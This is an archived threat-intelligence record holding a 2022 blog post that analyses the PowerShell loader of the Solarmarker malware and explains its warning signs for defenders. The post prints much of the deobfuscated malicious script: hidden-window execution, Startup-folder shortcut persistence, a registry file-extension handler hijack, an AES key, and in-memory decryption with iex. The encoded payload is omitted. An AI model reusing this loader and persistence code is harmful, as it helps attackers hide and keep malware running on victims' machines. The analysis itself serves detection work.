{
	"id": "11510899-488c-4844-8c1c-88d33b541258",
	"created_at": "2026-04-06T00:19:52.234016Z",
	"updated_at": "2026-04-10T03:21:24.084918Z",
	"deleted_at": null,
	"sha1_hash": "785d0dfc1b47fcb9410d6841be571fa04e72f473",
	"title": "Solarmarker: The Old is New",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 641828,
	"plain_text": "Solarmarker: The Old is New\r\nPublished: 2022-09-27 · Archived: 2026-04-05 16:28:56 UTC\r\nThe purpose of this blogpost is to document the PowerShell used by Solarmarker. The PowerShell was first observed between Feb 2022 and May 2022 and then resurfaced in September 2022.\r\nThe goal of this post is to publish information regarding the PowerShell to enable others to identify and understand what the PowerShell is doing.\r\nDetecting these tactics matters both for detecting Solarmarker and for detecting other malware.\r\nIntro\r\nFrom May 2022 – August 2022, the Solarmarker developer moved away from using PowerShell scripts and from executing PowerShell through System.Management.Automation.dll to creating persistence with native .NET commands. The use of PowerShell was observed between Feb 2022 and May 2022. The PowerShell was also observed in a recent sample, and as a result it became worthwhile to publish about the PowerShell. The PowerShell from both periods is virtually the same, which lets us identify the malware easily and consistently attribute it to Solarmarker.\r\nScript Overview\r\nPowerShell script content can be logged with PowerShell Script Block Logging, or it can be logged through EDR. In this instance, the detection logged 13 massive blocks of PowerShell. Most of the PowerShell script blocks consisted of a Base64 encoded payload. I’ve included the PowerShell below without the encoded payload.\r\nThe PowerShell script is normally one block, but we’ve broken it up for readability in the image below.\r\nhttps://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/\r\nPage 1 of 6\r\nImage: PowerShell from the payload.\r\nFirst, let’s talk about the (many) red flags that suggest it’s malicious:\r\nThe functions and variables don’t have human readable names.\r\nSometimes there’s a good reason to have short and simple PowerShell function or variable names, but in many cases PowerShell should be easy to follow. This helps analysts understand what is happening and helps developers revise the PowerShell when needed. In this case, the long random names are suspicious.\r\nThe PowerShell uses “chunking.”\r\nChunking is breaking up words to avoid detection. For example, ‘\\M’+’icr’+’oso’+’ft’+’\\W’+’ind’+’ow’+’s\\’+’St’+’art’+’ Me’+’nu’+’\\Pr’+’ogr’+’ams\\’+’St’+’art’+’up’. This chunking can prevent some detections from catching the full words. Chunking is abnormal for benign scripts and is an indicator that the author is trying to avoid being detected.\r\nThe script uses “Reflection.Assembly” to load something into memory.\r\n“Reflection.Assembly” has legitimate uses, but combined with the other red flags, this tells us the author is loading a DotNet binary into memory instead of writing it to disk. This prevents antivirus from finding the binary on disk, as the payload is only decrypted in memory.\r\nThe massive Base64 string is suspicious.\r\nBase64 encoding can have legitimate purposes. But if it’s uncommon in an environment, or if an administrator or developer is unfamiliar with the Base64 used, the PowerShell should be considered suspicious.\r\nThe use of AES encryption in a script (“AesCryptoServiceProvider”).\r\nUsing AES encryption is a reliable way for malware to avoid detection, and it’s uncommon and highly unusual to find it in legitimate PowerShell scripts.\r\nThe script uses “iex,” also known as “Invoke-Expression.”\r\nInvoke-Expression is a common way for attackers to execute code. When reviewing PowerShell, it’s important to investigate what’s being executed. When “iex” is used, it should be considered suspicious.\r\nScript Content\r\nTo make the PowerShell script more readable, we use “find and replace” to rename variables based on what we think each part is doing, given the surrounding context. Find and replace lets us see where the same variables are reused.\r\nIf you do this, be prepared to make guesses that you’ll likely revise later. In renaming the variables, we may also need to do some Googling to better understand functions and to help us give the variables better names. If you can’t read the image, don’t worry, parts will be copied below.\r\nImage: PowerShell after variables have been renamed.\r\nNow that we’ve cleaned up the PowerShell, we finally have an idea of what’s going on.\r\nThe PowerShell first sets up two functions: “create_random,” which is used for generating random names later, and “create_registry_key.” “create_registry_key” takes two parameters: the path of the registry key to be created and the content the key will have.\r\nfunction create_random {\r\nreturn -join (0..(10..30|Get-Random)|%{[char]((97..122)|Get-Random)})\r\n}\r\nfunction create_registry_key { param($registryKeyPath, $registryKeyContent);\r\nif (-Not (Test-Path \"Registry::$registryKeyPath \".Trim())){\r\nNew-Item -Path \"Registry::$registryKeyPath \".Trim() -ItemType RegistryKey -Force;\r\n}\r\nSet-Item -Path \"Registry::$registryKeyPath \".Trim() -Value $registryKeyContent;\r\n}\r\nThe PowerShell imports a Windows DLL (user32.dll) to access the Windows API “Win32ShowWindowAsync.” Using this Windows API, the malware can make sure the PowerShell or current window stays hidden at execution.\r\n$hiddenWindow=\"$showWindowAsync=Add-Type -MemberDefinition ('[DllImport(\"user32.dll\")]public static extern bool\r\niex $hiddenWindow;\r\nThe script then creates a few random names and also creates a directory in the user’s temporary directory. This randomly named folder, holding a randomly named file with a random file extension, will be used later; for now, it’s saved as “$pathToWriteTo.”\r\n$randomFileName=(create_random);\r\n$newFileExtension=(create_random);\r\n$randomFolderInTemp=\"$env:temp\\\"+(create_random);\r\nNew-Item -ItemType Directory -Force -Path $randomFolderInTemp;\r\n$pathToWriteTo = $randomFolderInTemp+'\\'+$randomFileName+'.'+$newFileExtension;\r\nAfter this path is created, a shortcut, or “.lnk” file, is created in the user’s Startup folder. The shortcut is created using WScript; it has a random name and points to our $pathToWriteTo variable. This is a favorite directory for malware authors, as files in it are executed on startup.\r\n$wscriptCommand=New-Object -comObject WScript.Shell;\r\n$startupShortcut=$wscriptCommand.CreateShortcut($env:appdata+'\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'+(\r\n$startupShortcut.TargetPath=$pathToWriteTo;\r\n$startupShortcut.WindowStyle=7;\r\n$startupShortcut.Save();\r\nThe PowerShell then uses the “create_registry_key” function defined earlier. It creates “HKEY_CURRENT_USER\\Software\\Classes\\”+$extensionClass+”\\shell\\open\\command,” which holds “powershell -command $binaryDecodeAndExecute.”\r\nThe variable “$binaryDecodeAndExecute” uses AES to decrypt the “LARGE-BLOCK-OF-BASE64” after it’s decoded from base64.\r\nThis variable also contains two cryptic lines:\r\n[Reflection.Assembly]::Load($UB);[cU0tev650WfbmHd2R.ArdcDR284Rt7PtrhOYIn]::jXEOyajI0oTBaWmmdt()\r\nThese lines load this DotNet module into memory using “Reflection.Assembly” and then execute it using a function exported by the module. The random strings are there to avoid detection: previously, defenders would flag the binary’s name, but the author has now randomized it.\r\n$binaryDecodeAndExecute = $hiddenWindow+ \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;\r\n$AC.Key=[Convert]::FromBase64String('U1+GbY9S+sraJD5n+VLaXjIEFeFkMaccxdshs7f3+5E=');\r\n$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('\"+$pathToWriteTo+\"'));\r\n$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();\r\n$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);\r\n$AC.Dispose();\r\n$extensionClass=(create_random);\r\ncreate_registry_key -registryKeyPath (\"HKEY_CURRENT_USER\\Software\\Classes\\\"+$extensionClass+\"\\shell\\open\\command\r\ncreate_registry_key -registryKeyPath (\"HKEY_CURRENT_USER\\Software\\Classes.\"+$newFileExtension) -registryKeyConte\r\n[IO.File]::WriteAllText($pathToWriteTo, ‘LARGE-BLOCK-OF-BASE64’);\r\niex $binaryDecodeAndExecute;\r\nThe first part of this block holds the commands needed to decrypt the binary, and all of the decryption commands are saved in the registry.\r\nThe second “create_registry_key” call sets up a registry key that will call the other registry key that was just established. This establishes an execution chain every time the computer is rebooted. This is explained in the following screenshots from a sandboxed environment.\r\nAs described previously, a file (“ydCbwPDZwnuefc”) was created in the Startup folder. This shortcut executes a file with a really long name. The file names are created by the “create_random” function and they differ between infections.\r\nImage: The file in the Startup directory for running the malware at each boot\r\nThis file is stored in the user’s local temp directory. The file with a really long name has a random extension: “PSDQD…” When this extension is used, it takes info stored in the randomly named “xqmsyf…” registry key.\r\nImage: The file with a new file extension and the file extension in the Windows registry\r\nThe “xqmsyf…” registry key contains the PowerShell command the script set up earlier. This PowerShell is the decryption and execution process noted above.\r\nImage: The registry key that contains the PowerShell to decode and execute the backdoor.\r\nAt the end of the script, the author also used “iex $binaryDecodeAndExecute” to execute the binary file and start the backdoor for its first run.\r\nOutro\r\nWe’ve looked thoroughly at the PowerShell script used by Solarmarker from Feb 2022 – May 2022 and seen again in September 2022. I hope this analysis helps you in identifying the malware in the past, present, and future.\r\nSource: https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/"
	],
	"report_names": [
		"solarmarker-the-old-is-new"
	],
	"threat_actors": [],
	"ts_created_at": 1775434792,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/785d0dfc1b47fcb9410d6841be571fa04e72f473.pdf",
		"text": "https://archive.orkl.eu/785d0dfc1b47fcb9410d6841be571fa04e72f473.txt",
		"img": "https://archive.orkl.eu/785d0dfc1b47fcb9410d6841be571fa04e72f473.jpg"
	}
}